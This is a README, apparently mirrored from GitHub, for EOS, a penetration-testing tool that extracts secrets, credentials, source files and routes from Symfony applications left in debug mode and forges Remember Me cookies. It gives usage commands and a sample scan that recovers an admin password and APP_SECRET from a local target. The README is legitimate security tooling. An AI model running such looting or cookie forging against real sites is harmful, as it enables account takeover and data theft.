Star 历史趋势
数据来源: GitHub API · 生成自 Stargazers.cn
README.md

Enemies Of Symfony (EOS)

EOS loots information from a Symfony target in debug mode:

SectionDescription
GeneralGet general information about the target.
PhpinfoExtract Symfony environment variables from the exposed phpinfo().
RoutesGet the list of registered routes.
Request logsLook for credentials in POST request logs.
Project filesRetrieve project files (configuration, database, etc.) based on a wordlist.
SourcesExtract the application source code.
CookiesCraft Remember Me cookies.

More info at https://www.synacktiv.com/posts/pentest/looting-symfony-with-eos.html.

Note that this tool does not exploit any Symfony vulnerability. The profiler is a useful component for developers and EOS simply takes advantage on misconfigured Symfony applications. In fact, the profiler documentation prominently warns developers:

Never enable the profiler in production environments as it will lead to major security vulnerabilities in your project.

Thanks to all the Symfony team for their awesome work!

Installation

Tested on Python >= 3.7.

$ git clone https://github.com/Synacktiv/eos
$ python3 -m pip install --user ./eos

Usage

usage: eos [-h] [-V] [-v] [--no-colors] {scan,sources,get,creds,cookies} ...

  ███████╗ ██████╗ ███████╗
  ██╔════╝██╔═══██╗██╔════╝
  █████╗  ██║   ██║███████╗
  ██╔══╝  ██║   ██║╚════██║
  ███████╗╚██████╔╝███████║  Enemies Of Symfony
  ╚══════╝ ╚═════╝ ╚══════╝  v1.1

positional arguments:
  {scan,sources,get,creds,cookies}
    scan                 perform a full scan
    sources              download application source code
    get                  download a file from the application
    creds                extract credentials from request logs
    cookies              craft remember me cookies with a great lifetime

optional arguments:
  -h, --help             show this help message and exit
  -V, --version          display version info
  -v, --verbose          increase verbosity
  --no-colors            disable colors in output

examples:
  eos scan http://localhost
  eos scan -H 'Cookie: foo=bar; john=doe' -H 'User-Agent: EOS' http://localhost
  eos get http://localhost config/services.yaml
  eos cookies -u jane_admin -H '$2y$13$IMalnQpo7xfZD5FJGbEadOcqyj2mi/NQbQiI8v2wBXfjZ4nwshJlG' -s 67d829bf61dc5f87a73fd814e2c9f629
$ eos scan http://localhost --output results
[+] Starting scan on http://localhost
[+] 2020-04-23 14:21:26.463352 is a great day

[+] Info
[!]   Symfony 5.0.1
[!]   PHP 7.3.11-1~deb10u1
[!]   Environment: dev

[+] Request logs
[+] Found 9 POST requests
[!] Found the following credentials with a valid session:
[!]   jane_admin: kitten [ROLE_ADMIN]

[+] Phpinfo
[+] Available at http://localhost/_profiler/phpinfo
[+] Found 101 PHP variables
[!] Found the following Symfony variables:
[!]   APP_ENV: dev
[!]   APP_SECRET: 67d829bf61dc5f87a73fd814e2c9f629
[!]   DATABASE_URL: sqlite:///%kernel.project_dir%/data/database.sqlite
[!]   MAILER_URL: null://localhost

[+] Project files
[+] Found: composer.lock, run 'symfony security:check' or submit it at https://security.symfony.com
[!] Found the following files:
[!]   composer.lock
[!]   composer.json
[!]   config/bundles.php
[!]   config/bootstrap.php
[!]   config/packages/assets.yaml
[!]   config/packages/cache.yaml
[!]   config/packages/dev/debug.yaml
[!]   config/packages/dev/monolog.yaml
[!]   config/packages/dev/routing.yaml
[!]   config/packages/dev/swiftmailer.yaml
[!]   config/packages/dev/web_profiler.yaml
[!]   config/packages/doctrine_migrations.yaml
[!]   config/packages/doctrine.yaml
[!]   config/packages/framework.yaml
[!]   config/packages/html_sanitizer.yaml
[!]   config/packages/prod/doctrine.yaml
[!]   config/packages/prod/monolog.yaml
[!]   config/packages/prod/routing.yaml
[!]   config/packages/prod/webpack_encore.yaml
[!]   config/packages/routing.yaml
[!]   config/packages/security.yaml
[!]   config/packages/sensio_framework_extra.yaml
[!]   config/packages/swiftmailer.yaml
[!]   config/packages/test/dama_doctrine_test_bundle.yaml
[!]   config/packages/test/framework.yaml
[!]   config/packages/test/monolog.yaml
[!]   config/packages/test/routing.yaml
[!]   config/packages/test/security.yaml
[!]   config/packages/test/swiftmailer.yaml
[!]   config/packages/test/twig.yaml
[!]   config/packages/test/validator.yaml
[!]   config/packages/test/webpack_encore.yaml
[!]   config/packages/test/web_profiler.yaml
[!]   config/packages/translation.yaml
[!]   config/packages/twig.yaml
[!]   config/packages/validator.yaml
[!]   config/packages/webpack_encore.yaml
[!]   config/routes/annotations.yaml
[!]   config/routes/dev/framework.yaml
[!]   config/routes/dev/web_profiler.yaml
[!]   config/routes.yaml
[!]   config/services.yaml
[!]   data/database.sqlite
[!]   data/database_test.sqlite
[!]   package.json
[!]   public/index.php
[!]   public/robots.txt
[!]   README.md
[!]   src/Kernel.php
[!]   symfony.lock
[!]   var/cache/dev/url_generating_routes.php
[!]   var/cache/dev/url_matching_routes.php
[!]   var/log/dev.log

[+] Routes
[!] Found the following routes:
[!]   /{_locale}/admin/post/
[!]   /{_locale}/admin/post/
[!]   /{_locale}/admin/post/new
[!]   /{_locale}/admin/post/{id}
[!]   /{_locale}/admin/post/{id}/edit
[!]   /{_locale}/admin/post/{id}/delete
[!]   /{_locale}/blog/
[!]   /{_locale}/blog/rss.xml
[!]   /{_locale}/blog/page/{page}
[!]   /{_locale}/blog/posts/{slug}
[!]   /{_locale}/blog/comment/{postSlug}/new
[!]   /{_locale}/blog/search
[!]   /{_locale}/login
[!]   /{_locale}/logout
[!]   /{_locale}/profile/edit
[!]   /{_locale}/profile/change-password
[!]   /{_locale}

[+] Project sources
[!] Found the following source files:
[!]   src/Command/AddUserCommand.php
[!]   src/Command/DeleteUserCommand.php
[!]   src/Command/ListUsersCommand.php
[!]   src/Controller/Admin/BlogController.php
[!]   src/Controller/BlogController.php
[!]   src/Controller/SecurityController.php
[!]   src/Controller/UserController.php
[!]   src/DataFixtures/AppFixtures.php
[!]   src/Entity/Comment.php
[!]   src/Entity/Post.php
[!]   src/Entity/Tag.php
[!]   src/Entity/User.php
[!]   src/EventSubscriber/CheckRequirementsSubscriber.php
[!]   src/EventSubscriber/CommentNotificationSubscriber.php
[!]   src/EventSubscriber/ControllerSubscriber.php
[!]   src/EventSubscriber/RedirectToPreferredLocaleSubscriber.php
[!]   src/Events/CommentCreatedEvent.php
[!]   src/Form/CommentType.php
[!]   src/Form/DataTransformer/TagArrayToStringTransformer.php
[!]   src/Form/PostType.php
[!]   src/Form/Type/ChangePasswordType.php
[!]   src/Form/Type/DateTimePickerType.php
[!]   src/Form/Type/TagsInputType.php
[!]   src/Form/UserType.php
[!]   src/Kernel.php
[!]   src/Pagination/Paginator.php
[!]   src/Repository/PostRepository.php
[!]   src/Repository/TagRepository.php
[!]   src/Repository/UserRepository.php
[!]   src/Security/PostVoter.php
[!]   src/Twig/AppExtension.php
[!]   src/Twig/SourceCodeExtension.php
[!]   src/Utils/Markdown.php
[!]   src/Utils/MomentFormatConverter.php
[!]   src/Utils/Slugger.php
[!]   src/Utils/Validator.php

[+] Saving files to results
[+] Saved 88 files

[+] Generated tokens: 5894a5 f68efa
[+] Scan completed in 0:00:13

关于 About

Enemies Of Symfony - Debug mode Symfony looter

语言 Languages

Python99.2%
Dockerfile0.8%

提交活跃度 Commit Activity

代码提交热力图
过去 52 周的开发活跃度
0
Total Commits
峰值: 1次/周
Less
More

核心贡献者 Contributors